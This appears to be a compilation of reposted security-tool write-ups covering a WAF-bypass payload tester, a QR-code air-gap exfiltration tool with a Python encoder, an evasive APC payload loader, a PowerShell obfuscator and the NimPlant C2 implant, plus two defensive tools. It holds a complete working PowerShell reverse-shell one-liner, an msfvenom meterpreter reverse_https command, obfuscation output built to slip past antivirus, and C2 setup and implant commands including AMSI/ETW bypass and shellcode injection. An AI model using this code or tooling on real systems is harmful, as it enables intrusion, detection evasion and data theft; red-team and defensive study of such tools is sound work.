
Waf-Bypass - Check Your WAF Before An Attacker Does


WAF Bypass Tool is an open source tool to analyze the security of any WAF for False Positives and False Negatives using predefined and customizable payloads. Check your WAF before an attacker does. WAF Bypass Tool is developed by the Nemesida WAF team with the participation of the community.


How to run

It is forbidden to use this tool for illegal purposes. Don't break the law. We are not responsible for any risks associated with the use of this software.

Run from Docker

The latest waf-bypass is always available on Docker Hub. It can be easily pulled and run via the following commands:

# docker pull nemesida/waf-bypass
# docker run nemesida/waf-bypass --host='example.com'

Run source code from GitHub

# git clone https://github.com/nemesida-waf/waf_bypass.git /opt/waf-bypass/
# python3 -m pip install -r /opt/waf-bypass/requirements.txt
# python3 /opt/waf-bypass/main.py --host='example.com'

Options

  • '--proxy' (--proxy='http://proxy.example.com:3128') - allows you to specify a proxy to connect through instead of connecting to the host directly.

  • '--header' (--header 'Authorization: Basic YWRtaW46YWRtaW4=' --header 'X-TOKEN: ABCDEF') - allows you to specify an HTTP header to send with all requests (e.g. for authentication). Multiple use is allowed.

  • '--user-agent' (--user-agent 'MyUserAgent 1/1') - allows you to specify the HTTP User-Agent to send with all requests, except when the User-Agent is set by the payload ("USER-AGENT").

  • '--block-code' (--block-code='403' --block-code='222') - allows you to specify the HTTP status code(s) to expect when the WAF blocks a request (default is 403). Multiple use is allowed.

  • '--threads' (--threads=15) - allows you to specify the number of parallel scan threads (default is 10).

  • '--timeout' (--timeout=10) - allows you to specify the request processing timeout in seconds (default is 30).

  • '--json-format' - displays the results in JSON format (useful for integrating the tool with security platforms).

  • '--details' - displays the False Positive and False Negative payloads. Not available in JSON format.

  • '--exclude-dir' (--exclude-dir='SQLi' --exclude-dir='XSS') - excludes a payload directory. Multiple use is allowed.

Payloads

Depending on the purpose, payloads are located in the appropriate folders:

  • FP - False Positive payloads
  • API - API testing payloads
  • CM - Custom HTTP Method payloads
  • GraphQL - GraphQL testing payloads
  • LDAP - LDAP Injection and related payloads
  • LFI - Local File Include payloads
  • MFD - multipart/form-data payloads
  • NoSQLi - NoSQL injection payloads
  • OR - Open Redirect payloads
  • RCE - Remote Code Execution payloads
  • RFI - Remote File Inclusion payloads
  • SQLi - SQL injection payloads
  • SSI - Server-Side Includes payloads
  • SSRF - Server-side request forgery payloads
  • SSTI - Server-Side Template Injection payloads
  • UWA - Unwanted Access payloads
  • XSS - Cross-Site Scripting payloads

Write your own payloads

When composing a payload, the following zones, methods and options are used:

  • URL - request's path
  • ARGS - request's query
  • BODY - request's body
  • COOKIE - request's cookie
  • USER-AGENT - request's user-agent
  • REFERER - request's referer
  • HEADER - request's header
  • METHOD - request's method
  • BOUNDARY - specifies the contents of the request's boundary. Applicable only to payloads in the MFD directory.
  • ENCODE - specifies the type of payload encoding (Base64, HTML-ENTITY, UTF-16) applied in addition to the payload's own encoding. Multiple values are separated by a space (e.g. Base64 UTF-16). Applicable only to the ARGS, BODY, COOKIE and HEADER zones. Not applicable to payloads in the API and MFD directories. Not compatible with the JSON option.
  • JSON - specifies that the request's body should be in JSON format
  • BLOCKED - specifies that the request should be blocked (FN testing) or not (FP)

Except for some cases described below, the zones are independent of each other and are tested separately (thus, if 2 zones are specified, the script will send 2 requests, checking each zone in turn).

For the zones you can use the %RND% suffix, which generates an arbitrary string of 6 letters and numbers (e.g.: param%RND%=my_payload or param=%RND% OR A%RND%B).

You can create your own payloads. To do this, create your own folder in the '/payload/' directory, or place the payload in an existing one (e.g. '/payload/XSS'). The allowed data format is JSON.
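
Since payload files are plain JSON, a new one can be generated with a few lines of Python. Note that the exact JSON schema is not documented in this overview, so the field layout below is an assumption built from the zones and options described above; check the bundled payloads for the authoritative format.

# Hypothetical payload for /payload/XSS/ -- the key names mirror the zones
# and options described above, but this is an assumed schema, not the
# documented one.
import json

payload = {
    "payload": {
        "ARGS": "param%RND%=<script>alert('%RND%')</script>",  # query-string zone
        "ENCODE": "Base64",   # additionally Base64-encode the payload
        "BLOCKED": True,      # the WAF is expected to block this (FN testing)
    }
}

with open("/opt/waf-bypass/payload/XSS/my-xss.json", "w") as f:
    json.dump(payload, f, indent=2)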

API directory

API testing payloads located in this directory are automatically sent with the header 'Content-Type: application/json'.

MFD directory

For MFD (multipart/form-data) payloads located in this directory, you must specify the BODY (required) and BOUNDARY (optional). If BOUNDARY is not set, it will be generated automatically (in this case, only the payload itself must be specified for the BODY, without additional data like '... Content-Disposition: form-data; ...').

If a BOUNDARY is specified, the content of the BODY must be formatted in accordance with the RFC, which allows multiple payloads in the BODY, separated by the BOUNDARY.

Other zones are also allowed in this directory (e.g.: URL, ARGS, etc.). Regardless of the zone, the header 'Content-Type: multipart/form-data; boundary=...' will be added to all requests.



QRExfiltrate - Tool That Allows You To Convert Any Binary File Into A QRcode Movie. The Data Can Then Be Reassembled Visually Allowing Exfiltration Of Data In Air Gapped Systems


This tool is a command line utility that allows you to convert any binary file into a QRcode GIF. The data can then be reassembled visually allowing exfiltration of data in air gapped systems. It was designed as a proof of concept to demonstrate weaknesses in DLP software; that is, the assumption that data will leave the system via email, USB sticks or other media.

The tool works by taking a binary file and converting it into a series of QR code images. These images are then combined into a GIF file whose frames can be read back with any standard QR code reader. This allows data to be exfiltrated without detection by most DLP systems.
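
For intuition, here is a minimal Python sketch of the same idea (QRExfiltrate itself is a shell script built on qrencode and ffmpeg, so this is an illustration, not the tool's code). It assumes the third-party qrcode (with Pillow) and imageio packages are installed.

# Chunk a file into 64-byte pieces (the tool's documented per-frame cap),
# render one QR code per chunk at a fixed QR version so every frame has a
# uniform size, and combine the frames into a GIF.
import base64
import imageio.v2 as imageio
import numpy as np
import qrcode

CHUNK = 64  # bytes per frame

def encode(infile, outfile="output.gif"):
    data = open(infile, "rb").read()
    frames = []
    for i in range(0, len(data), CHUNK):
        qr = qrcode.QRCode(version=6, box_size=4, border=4)
        qr.add_data(base64.b64encode(data[i:i + CHUNK]))  # base64 keeps QR byte mode clean
        qr.make(fit=False)
        frames.append(np.asarray(qr.make_image().convert("L")))
    imageio.mimsave(outfile, frames, duration=0.5)  # half a second per frame

encode("secret.bin")  # example input file name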


How to Use

To use QRExfiltrate, open a command line and navigate to the directory containing the QRExfiltrate scripts.

Once you have done this, you can run the following command to convert your binary file into a QRcode GIF:

./encode.sh ./draft-taddei-ech4ent-introduction-00.txt output.gif

Demo

encode.sh <inputfile> <outputfile>

Where <inputfile> is the path to the binary file you wish to convert and <outputfile> is the path to the desired output GIF file; if no output file is specified, output.gif is used.

Once the command completes, you will have a GIF file containing the data from your binary file.

You can then transfer this GIF file as you wish and reassemble the data using any standard QR code reader.

Prerequisites

QRExfiltrate requires the following prerequisites:

  • qrencode
  • ffmpeg

Limitations

QRExfiltrate is limited by the size of the source data: encoding has been capped at 64 bytes per frame to ensure the resulting frames have a uniform size and shape. Additionally, the conversion to QR codes carries significant storage overhead; on average, the resulting GIF is 50x larger than the original (so a 1 MB input yields a GIF of roughly 50 MB). Finally, QRExfiltrate is limited by the capabilities of the QR code reader: if the reader cannot detect the QR codes in the GIF, the data cannot be reassembled.

The decoder script has been intentionally omitted.

Conclusion

QRExfiltrate is a powerful tool that can be used to bypass DLP systems and exfiltrate data in air gapped networks. However, it is important to note that QRExfiltrate should be used with caution and only in situations where the risk of detection is low.



Mimicry - Security Tool For Active Deception In Exploitation And Post-Exploitation


Mimicry is a security tool developed by Chaitin Technology for active deception in exploitation and post-exploitation.

Active deception can live-migrate an attacker to the honeypot without their awareness. With active deception, we can achieve a higher security level at a lower cost.



Quick Start

1. Make sure docker and docker-compose are installed correctly on the machine

docker info
docker-compose version

2. Install honeypot service

docker-compose build
docker-compose up -d

3. Deploy deception tool on other machines

Update config.yaml, replacing ${honeypot_public_ip} with the public IP of the honeypot service.

4. Perform Webshell deceiving

./mimicry-tools webshell -c config.yaml -t php -p webshell_path

Advance Usage

  • Web-Deception: fake vulnerabilities in web applications
  • Webshell-Deception: live-migrate a webshell to the honeypot
  • Shell-Deception: live-migrate a ReverseShell/BindShell to the honeypot

️
Contact Us

  1. You can submit bug reports and feature suggestions directly through GitHub Issues.
  2. You can join the discussion group on Discord.


APCLdr - Payload Loader With Evasion Features


Payload Loader With Evasion Features.

Features:

  • No CRT functions imported
  • Indirect syscalls using HellHall
  • API hashing using the CRC32 hashing algorithm (a sketch of the idea follows this list)
  • Payload encryption using RC4; the payload is saved in the .rsrc section
  • Payload injection using APC calls on an alertable thread
  • Payload execution using APC on an alertable thread
  • Execution delay using MsgWaitForMultipleObjects
  • Total size is 8 KB plus the payload size
  • Compatible with LLVM (clang-cl)
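
The CRC32 API-hashing trick is easy to picture outside of C; below is a minimal Python illustration (the loader itself implements this in C against the PE export table):

# Instead of embedding API names like "VirtualAlloc" as strings, the loader
# stores their CRC32 hashes and resolves each function by hashing every
# export name until one matches. Illustration only -- not the loader's code.
import zlib

def crc32_hash(name):
    return zlib.crc32(name.encode("ascii")) & 0xFFFFFFFF

TARGET = crc32_hash("VirtualAlloc")  # precomputed at build time

exports = ["CreateFileW", "VirtualAlloc", "WriteProcessMemory"]  # stand-in export table
resolved = next(name for name in exports if crc32_hash(name) == TARGET)
print(resolved)  # VirtualAlloc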

Usage:

  • Use the Builder to update the PayloadFile.pf file; this will be the encrypted payload saved in the .rsrc section of the loader
  • Compile as x64 Release

Debugging:

  • Change Linker > SubSystem from /SUBSYSTEM:WINDOWS to /SUBSYSTEM:CONSOLE
  • Set the loader to debug mode (uncomment the debug section in the source)
  • Build as Release as well



Tested with Cobalt Strike and Havoc on Windows 10.



PortexAnalyzerGUI - Graphical Interface For PortEx, A Portable Executable And Malware Analysis Library



Graphical interface for PortEx, a Portable Executable and Malware Analysis Library

Download

Releases page

Features

  • Header information from: MSDOS Header, Rich Header, COFF File Header, Optional Header, Section Table
  • PE Structures: Import Section, Resource Section, Export Section, Debug Section
  • Scanning for file format anomalies
  • Visualize file structure, local entropies and byteplot, and save it as PNG
  • Calculate Shannon Entropy, Imphash, MD5, SHA256, Rich and RichPV hash (a sketch of the entropy calculation follows this list)
  • Overlay and overlay signature scanning
  • Version information and manifest
  • Icon extraction and saving as PNG
  • Customized signature scanning via Yara. Internal signature scans using PEiD signatures and an internal filetype scanner.
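
Shannon entropy over bytes follows the standard formula H = -Σ p(b)·log2 p(b); here is a short Python illustration (PortEx itself is a Java/Scala library, so this just shows the computation, not PortEx's code):

# Entropy close to 8 bits/byte suggests packed or encrypted data, which is
# why entropy is useful in malware triage.
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    n = len(data)
    probs = [c / n for c in Counter(data).values()]
    return 0.0 - sum(p * math.log2(p) for p in probs)

print(shannon_entropy(b"AAAA"))            # 0.0 (uniform data, minimal entropy)
print(shannon_entropy(bytes(range(256))))  # 8.0 (maximal entropy)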

Supported OS and JRE

I test this program on Linux and Windows, but it should work on any OS with JRE version 9 or higher.

Future

I will be including more and more features that PortEx already provides.

These features include among others:

  • customized visualization
  • extraction and conversion of icons to .ICO files
  • dumping of sections, overlay, resources
  • export reports to txt, json, csv

Some of these features are already provided by PortexAnalyzer CLI version, which you can find here: PortexAnalyzer CLI

Donations

I develop PortEx and PortexAnalyzer as a hobby in my free time. If you like it, please consider buying me a coffee: https://ko-fi.com/struppigel

Author

Karsten Hahn

Twitter: @Struppigel

Mastodon: struppigel@infosec.exchange

Youtube: MalwareAnalysisForHedgehogs

License




Invoke-PSObfuscation - An In-Depth Approach To Obfuscating The Individual Components Of A PowerShell Payload Whether You're On Windows Or Kali Linux


Traditional obfuscation techniques tend to add layers to encapsulate standing code, such as base64 or compression. These payloads do continue to have a varied degree of success, but it has become trivial to extract the intended payload, and some launchers are detected often, which essentially introduces chokepoints.

The approach this tool introduces is a methodology where you can target and obfuscate the individual components of a script with randomized variations while achieving the same intended logic, without encapsulating the entire payload within a single layer. Due to the complexity of the obfuscation logic, the resulting payloads will be very difficult to signature and will slip past heuristic engines that are not programmed to emulate the inherited logic.

While this script can successfully obfuscate most payloads on its own, this project will also serve as a standing framework that I will use to produce future functions that provide dedicated obfuscated payloads, such as one that only produces reverse shells.

I wrote a blog piece for Offensive Security as a precursor into the techniques this tool introduces. Before venturing further, consider giving it a read first: https://www.offensive-security.com/offsec/powershell-obfuscation/


Dedicated Payloads

As part of my ongoing work with PowerShell obfuscation, I am building out scripts that produce dedicated payloads using this framework. These have helped save me time and I hope you find them useful as well. You can find them within their own folders at the root of this repository.

  1. Get-ReverseShell
  2. Get-DownloadCradle
  3. Get-Shellcode

Components

Like many other programming languages, PowerShell can be broken down into many different components that make up the executable logic. This allows us to defeat signature-based detections with relative ease by changing how we represent the individual components within a payload, transforming them into obscure or unintelligible derivatives.

Keep in mind that targeting every component in complex payloads is very intrusive. This tool is built so that you can target the components you want to obfuscate in a controlled manner. I have found that a lot of signatures can be defeated simply by targeting cmdlets, variables and any comments. When using this against complex payloads, such as PrintNightmare, keep in mind that custom function parameters / variables will also be changed. Always be sure to properly test any resulting payloads and ensure you are aware of any modified named parameters.

Component types such as pipes and pipeline variables are introduced here to help make your payload more obscure and harder to decode.

Supported Types

  • Aliases (iex)
  • Cmdlets (New-Object)
  • Comments (# and <# #>)
  • Integers (4444)
  • Methods ($client.GetStream())
  • Namespace Classes (System.Net.Sockets.TCPClient)
  • Pipes (|)
  • Pipeline Variables ($_)
  • Strings ("value" | 'value')
  • Variables ($client)

Generators

Each component has its own dedicated generator that contains a list of possible static or dynamically generated values that are randomly selected during each execution. If there are multiple instances of a component, it will iterate over each of them individually with a generator. This adds a degree of randomness each time you run this tool against a given payload, so each iteration will be different. The only exception to this is variable names.

If an algorithm related to a specific component starts to cause a payload to flag, the current design allows us to easily modify the logic for that generator without compromising the entire script.

$Picker = 1..6 | Get-Random
Switch ($Picker) {
    1 { $NewValue = 'Stay' }
    2 { $NewValue = 'Off' }
    3 { $NewValue = 'Ronins' }
    4 { $NewValue = 'Lawn' }
    5 { $NewValue = 'And' }
    6 { $NewValue = 'Rocks' }
}

Requirements

This framework and the resulting payloads have been tested on the following operating systems and PowerShell versions. The resulting reverse shells will not work on PowerShell v2.0.

PS Version       OS Tested               Invoke-PSObfuscation.ps1   Reverse Shell
7.1.3            Kali 2021.2             Supported                  Supported
5.1.19041.1023   Windows 10 10.0.19042   Supported                  Supported
5.1.21996.1      Windows 11 10.0.21996   Supported                  Supported

Usage Examples

CVE-2021-34527 (PrintNightmare)

┌──(tristram㉿kali)-[~]
└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

PS /home/tristram> . ./Invoke-PSObfuscation.ps1
PS /home/tristram> Invoke-PSObfuscation -Path .\CVE-2021-34527.ps1 -Cmdlets -Comments -NamespaceClasses -Variables -OutFile o-printnightmare.ps1

>> Layer 0 Obfuscation
>> https://github.com/gh0x0st

[*] Obfuscating namespace classes
[*] Obfuscating cmdlets
[*] Obfuscating variables
[-] -DriverName is now -QhYm48JbCsqF
[-] -NewUser is now -ybrcKe
[-] -NewPassword is now -ZCA9QHerOCrEX84gMgNwnAth
[-] -DLL is now -dNr
[-] -ModuleName is now -jd
[-] -Module is now -tu3EI0q1XsGrniAUzx9WkV2o
[-] -Type is now -fjTOTLDCGufqEu
[-] -FullName is now -0vEKnCqm
[-] -EnumElements is now -B9aFqfvDbjtOXPxrR
[-] -Bitfield is now -bFUCG7LB9gq50p4e
[-] -StructFields is now -xKryDRQnLdjTC8
[-] -PackingSize is now -0CB3X
[-] -ExplicitLayout is now -YegeaeLpPnB
[*] Removing comments
[*] Writing payload to o-printnightmare.ps1
[*] Done

PS /home/tristram>

PowerShell Reverse Shell

$client = New-Object System.Net.Sockets.TCPClient("127.0.0.1",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
┌──(tristram㉿kali)-[~]
└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

PS /home/tristram> . ./Invoke-PSObfuscation.ps1
PS /home/tristram> Invoke-PSObfuscation -Path ./revshell.ps1 -Integers -Cmdlets -Strings -ShowChanges

>> Layer 0 Obfuscation
>> https://github.com/gh0x0st

[*] Obfuscating integers
Generator 2 >> 4444 >> $(0-0+0+0-0-0+0+4444)
Generator 1 >> 65535 >> $((65535))
[*] Obfuscating strings
Generator 2 >> 127.0.0.1 >> $([char](16*49/16)+[char](109*50/109)+[char](0+55-0)+[char](20*46/20)+[char](0+48-0)+[char](0+46-0)+[char](0+48-0)+[char](0+46-0)+[char](51*49/51))
Generator 2 >> PS >> $([char](1*80/1)+[char](86+83-86)+[char](0+32-0))
Generator 1 >> > >> ([string]::join('', ( (62,32) |%{ ( [char][int] $_)})) | % {$_})
[*] Obfuscating cmdlets
Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_})
Generator 2 >> New-Object >> & ([string]::join('', ( (78,101,119,45,79,98,106,101,99,116) |%{ ( [char][int] $_)})) | % {$_})
Generator 1 >> Out-String >> & (("Tpltq1LeZGDhcO4MunzVC5NIP-vfWow6RxXSkbjYAU0aJm3KEgH2sFQr7i8dy9B")[13,16,3,25,35,3,55,57,17,49] -join '')
[*] Writing payload to /home/tristram/obfuscated.ps1
[*] Done

Obfuscated PowerShell Reverse Shell

Meterpreter PowerShell Shellcode

┌──(tristram㉿kali)-[~]
└─$ pwsh
PowerShell 7.1.3
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

PS /home/kali> msfvenom -p windows/meterpreter/reverse_https LHOST=127.0.0.1 LPORT=443 EXITFUNC=thread -f ps1 -o meterpreter.ps1
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 686 bytes
Final size of ps1 file: 3385 bytes
Saved as: meterpreter.ps1
PS /home/kali> . ./Invoke-PSObfuscation.ps1
PS /home/kali> Invoke-PSObfuscation -Path ./meterpreter.ps1 -Integers -Variables -OutFile o-meterpreter.ps1

>> Layer 0 Obfuscation
>> https://github.com/gh0x0st

[*] Obfuscating integers
[*] Obfuscating variables
[*] Writing payload to o-meterpreter.ps1
[*] Done

Comment-Based Help

<#
.SYNOPSIS
Transforms PowerShell scripts into something obscure, unclear, or unintelligible.

.DESCRIPTION
Where most obfuscation tools tend to add layers to encapsulate standing code, such as base64 or compression,
they tend to leave the intended payload intact, which essentially introduces chokepoints. Invoke-PSObfuscation
focuses on replacing the existing components of your code, or layer 0, with alternative values.

.PARAMETER Path
A user provided PowerShell payload via a flat file.

.PARAMETER All
The all switch is used to engage every supported component to obfuscate a given payload. This action is very intrusive
and could result in your payload being broken. There should be no issues when using this with the vanilla reverse
shell. However, it's recommended to target specific components with more advanced payloads. Keep in mind that some of
the generators introduced in this script may even confuse your ISE so be sure to test properly.

.PARAMETER Aliases
The aliases switch is used to instruct the function to obfuscate aliases.

.PARAMETER Cmdlets
The cmdlets switch is used to instruct the function to obfuscate cmdlets.

.PARAMETER Comments
The comments switch is used to instruct the function to remove all comments.

.PARAMETER Integers
The integers switch is used to instruct the function to obfuscate integers.

.PARAMETER Methods
The methods switch is used to instruct the function to obfuscate method invocations.

.PARAMETER NamespaceClasses
The namespaceclasses switch is used to instruct the function to obfuscate namespace classes.

.PARAMETER Pipes
The pipes switch is used to instruct the function to obfuscate pipes.

.PARAMETER PipelineVariables
The pipeline variables switch is used to instruct the function to obfuscate pipeline variables.

.PARAMETER ShowChanges
The ShowChanges switch is used to instruct the script to display the raw and obfuscated values on the screen.

.PARAMETER Strings
The strings switch is used to instruct the function to obfuscate prompt strings.

.PARAMETER Variables
The variables switch is used to instruct the function to obfuscate variables.

.EXAMPLE
PS C:\> Invoke-PSObfuscation -Path .\revshell.ps1 -All

.EXAMPLE
PS C:\> Invoke-PSObfuscation -Path .\CVE-2021-34527.ps1 -Cmdlets -Comments -NamespaceClasses -Variables -OutFile o-printernightmare.ps1

.OUTPUTS
System.String, System.String

.NOTES
Additional information about the function.
#>


NimPlant - A Light-Weight First-Stage C2 Implant Written In Nim


By Cas van Cooten (@chvancooten), with special thanks to some awesome folks:

  • Fabian Mosch (@S3cur3Th1sSh1t) for sharing dynamic invocation implementation in Nim and the Ekko sleep mask function
  • snovvcrash (@snovvcrash) for adding the initial version of execute-assembly & self-deleting implant option
  • Furkan Göksel (@frkngksl) for his work on NiCOFF and Guillaume Caillé (@OffenseTeacher) for the initial implementation of inline-execute
  • Kadir Yamamoto (@yamakadi) for the design work, initial Vue.JS front-end and rusty nimplant, part of an older branch (unmaintained)
  • Mauricio Velazco (@mvelazco), Dylan Makowski (@AnubisOnSec), Andy Palmer (@pivotal8ytes), Medicus Riddick (@retsdem22), Spencer Davis (@nixbyte), and Florian Roth (@cyb3rops), for their efforts in testing the pre-release and contributing detections

Feature Overview

  • Lightweight and configurable implant written in the Nim programming language
  • Pretty web GUI that will make you look cool during all your ops
  • Encryption and compression of all traffic by default, obfuscates static strings in implant artefacts
  • Support for several implant types, including native binaries (exe/dll), shellcode or self-deleting executables
  • Wide selection of commands focused on early-stage operations including local enumeration, file or registry management, and web interactions
  • Easy deployment of more advanced functionality or payloads via inline-execute, shinject (using dynamic invocation), or in-thread execute-assembly
  • Support for operations on any platform; the implant only targets x64 Windows for now
  • Comprehensive logging of all interactions and file operations
  • Much, much more, just see below :)

Instructions

Installation

  • Install Nim and Python3 on your OS of choice (installation via choosenim is recommended, as apt doesn't always have the latest version).
  • Install required packages using the Nimble package manager (cd client; nimble install -d).
  • Install requirements.txt from the server folder (pip3 install -r server/requirements.txt).
  • If you're on Linux or MacOS, install the mingw toolchain for your platform (brew install mingw-w64 or apt install mingw-w64).

Getting Started

Configuration

Before using NimPlant, create the configuration file config.toml. It is recommended to copy config.toml.example and work from there.

An overview of settings is provided below.

server:
  • ip: The IP that the C2 web server (including API) will listen on. Recommended to use 127.0.0.1; only use 0.0.0.0 when you have set up proper firewall or routing rules to protect the C2.
  • port: The port that the C2 web server (including API) will listen on.

listener:
  • type: The listener type, either HTTP or HTTPS. HTTPS options are configured below.
  • sslCertPath: The local path to an HTTPS certificate file (e.g. requested via LetsEncrypt CertBot or self-signed). Ignored when the listener type is 'HTTP'.
  • sslKeyPath: The local path to the corresponding HTTPS certificate private key file. If set, the password will be prompted for when running the NimPlant server. Ignored when the listener type is 'HTTP'.
  • hostname: The listener hostname. If not empty (""), NimPlant will use this hostname to connect. Make sure you are properly routing traffic from this host to the NimPlant listener port.
  • ip: The listener IP. Required even if 'hostname' is set, as it is used by the server to register on this IP.
  • port: The listener port. Required even if 'hostname' is set, as it is used by the server to register on this port.
  • registerPath: The URI path that new NimPlants will register with.
  • taskPath: The URI path that NimPlants will get tasks from.
  • resultPath: The URI path that NimPlants will submit results to.

nimplant:
  • riskyMode: Compile NimPlant with support for risky commands. Operator discretion advised. Disabling this will remove support for execute-assembly, powershell, shell and shinject.
  • sleepMask: Whether or not to use the Ekko sleep mask instead of regular sleep calls for NimPlants. Only works with regular executables for now!
  • sleepTime: The default sleep time in seconds for new NimPlants.
  • sleepJitter: The default jitter in percent for new NimPlants.
  • killDate: The kill date for NimPlants (format: yyyy-MM-dd). NimPlants will exit if this date has passed.
  • userAgent: The user-agent used by NimPlants. The server also uses this to validate NimPlant traffic, so it is recommended to choose a UA that is inconspicuous, but not too prevalent.

Compilation

Once the configuration is to your liking, you can generate NimPlant binaries to deploy on your target. Currently, NimPlant supports .exe, .dll, and .bin binaries for (self-deleting) executables, libraries, and position-independent shellcode (through sRDI), respectively. To generate, run python NimPlant.py compile followed by your preferred binaries (exe, exe-selfdelete, dll, raw, or all) and, optionally, the implant type (nim, or nim-debug). Files will be written to client/bin/.

You may pass the rotatekey argument to generate and use a new XOR key during compilation.

Notes:

  • NimPlant only supports x64 at this time!
  • The entrypoint for DLL files is Update, which is triggered by DllMain for all entrypoints. This means you can use e.g. rundll32 .\NimPlant.dll,Update to trigger, or use your LOLBIN of choice to sideload it (may need some modifications in client/NimPlant.nim)
PS C:\NimPlant> python .\NimPlant.py compile all

* *(# #
** **(## ##
######## ( ********
####(###########************,****
# ######## ******** *
.### ***
.######## ********
#### ### *** ****
######### ### *** *********
####### #### ## ** **** *******
##### ## * ** *****
###### #### ##*** **** .******
############### ***************
########## **********
#########**********
#######********
_ _ _ ____ _ _
| \ | (_)_ __ ___ | _ \| | __ _ _ __ | |_
| \| | | '_ ` _ \| |_) | |/ _` | '_ \| __|
| |\ | | | | | | | __/| | (_| | | | | |_
|_| \_|_|_| |_| |_|_| |_|\__ ,_|_| |_|\__|

A light-weight stage 1 implant and C2 based on Nim and Python
By Cas van Cooten (@chvancooten)

Compiling .exe for NimPlant
Compiling self-deleting .exe for NimPlant
Compiling .dll for NimPlant
Compiling .bin for NimPlant

Done compiling! You can find compiled binaries in 'client/bin/'.

Compilation with Docker

The Docker image chvancooten/nimbuild can be used to compile NimPlant binaries. Using Docker is easy and avoids dependency issues, as all required dependencies are pre-installed in this container.

To use it, install Docker for your OS and start the compilation in a container as follows.

docker run --rm -v `pwd`:/usr/src/np -w /usr/src/np chvancooten/nimbuild python3 NimPlant.py compile all

Usage

Once you have your binaries ready, you can spin up your NimPlant server! No additional configuration is necessary as it reads from the same config.toml file. To launch a server, simply run python NimPlant.py server (with sudo privileges if running on Linux). You can use the console once a Nimplant checks in, or access the web interface at http://localhost:31337 (by default).

Notes:

  • If you are running your NimPlant server externally from the machine where binaries are compiled, make sure that both config.toml and .xorkey match. If not, NimPlant will not be able to connect.
  • The web frontend and API do not support authentication, so do NOT expose the frontend port to any untrusted networks without a secured reverse proxy!
  • If NimPlant cannot connect to a server or loses connection, it will retry 5 times with an exponential backoff time before attempting re-registration. If it fails to register 5 more times (same backoff logic), it will kill itself. The backoff triples the sleep time on each failed attempt. For example, if the sleep time is 10 seconds, it will wait 10, then 30 (3^1 * 10), then 90 (3^2 * 10), then 270 (3^3 * 10), then 810 seconds before giving up (these parameters are hardcoded but can be changed in client/NimPlant.nim).
  • Logs are stored in the server/logs directory. Each server instance creates a new log folder, and logs are split per console/nimplant session. Downloads and uploads (including files uploaded via the web GUI) are stored in the server/uploads and server/downloads directories respectively.
  • Nimplant and server details are stored in an SQLite database at server/nimplant.db. This data is also used to recover Nimplants after a server restart.
  • Logs, uploaded/downloaded files, and the database can be cleaned up by running NimPlant.py with the cleanup flag. Caution: This will purge everything, so make sure to back up what you need first!
PS C:\NimPlant> python .\NimPlant.py server     

* *(# #
** **(## ##
######## ( ********
####(###########************,****
# ######## ******** *
.### ***
.######## ********
#### ### *** ****
######### ### *** *********
####### #### ## ** **** *******
##### ## * ** *****
###### #### ##*** **** .******
############### ***************
########## **********
#########**********
#######********
_ _ _ ____ _ _
| \ | (_)_ __ ___ | _ \| | __ _ _ __ | |_
| \| | | '_ ` _ \| |_) | |/ _` | '_ \| __|
| |\ | | | | | | | __/| | (_| | | | | |_
|_| \_|_|_| |_| |_|_| |_|\__ ,_|_| |_|\__|

A light-weight stage 1 implant and C2 written in Nim and Python
By Cas van Cooten (@chvancooten)

[06/02/2023 10:47:23] Started management server on http://127.0.0.1:31337.
[06/02/2023 10:47:23] Started NimPlant listener on https://0.0.0.0:443. CTRL-C to cancel waiting for NimPlants.

This will start both the C2 API and management web server (in the example above at http://127.0.0.1:31337) and the NimPlant listener (in the example above at https://0.0.0.0:443). Once a NimPlant checks in, you can use both the web interface and the console to send commands to NimPlant.

Available commands are as follows. You can get detailed help for any command by typing help [command]. Certain commands denoted with (GUI) can be configured graphically when using the web interface; this is done by calling the command without any arguments.

Command arguments shown as [required] <optional>.
Commands with (GUI) can be run without parameters via the web UI.

cancel Cancel all pending tasks.
cat [filename] Print a file's contents to the screen.
cd [directory] Change the working directory.
clear Clear the screen.
cp [source] [destination] Copy a file or directory.
curl [url] Get a webpage remotely and return the results.
download [remotefilepath] <localfilepath> Download a file from NimPlant's disk to the NimPlant server.
env Get environment variables.
execute-assembly (GUI) <BYPASSAMSI=0> <BLOCKETW=0> [localfilepath] <arguments> Execute .NET assembly from memory. AMSI/ETW patched by default. Loads the CLR.
exit Exit the server, killing all NimPlants.
getAv List Antivirus / EDR products on target using WMI.
getDom Get the domain the target is joined to.
getLocalAdm List local administrators on the target using WMI.
getpid Show process ID of the currently selected NimPlant.
getprocname Show process name of the currently selected NimPlant.
help <command> Show this help menu or command-specific help.
hostname Show hostname of the currently selected NimPlant.
inline-execute (GUI) [localfilepath] [entrypoint] <arg1 type1 arg2 type2..> Execute Beacon Object Files (BOF) from memory.
ipconfig List IP address information of the currently selected NimPlant.
kill Kill the currently selected NimPlant.
list Show list of active NimPlants.
listall Show list of all NimPlants.
ls <path> List files and folders in a certain directory. Lists the current directory by default.
mkdir [directory] Create a directory (and its parent directories if required).
mv [source] [destination] Move a file or directory.
nimplant Show info about the currently selected NimPlant.
osbuild Show operating system build information for the currently selected NimPlant.
powershell <BYPASSAMSI=0> <BLOCKETW=0> [command] Execute a PowerShell command in an unmanaged runspace. Loads the CLR.
ps List running processes on the target. Indicates current process.
pwd Get the current working directory.
reg [query|add] [path] <key> <value> Query or modify the registry. New values will be added as REG_SZ.
rm [file] Remove a file or directory.
run [binary] <arguments> Run a binary from disk. Returns output but blocks NimPlant while running.
screenshot Take a screenshot of the user's screen.
select [id] Select another NimPlant.
shell [command] Execute a shell command.
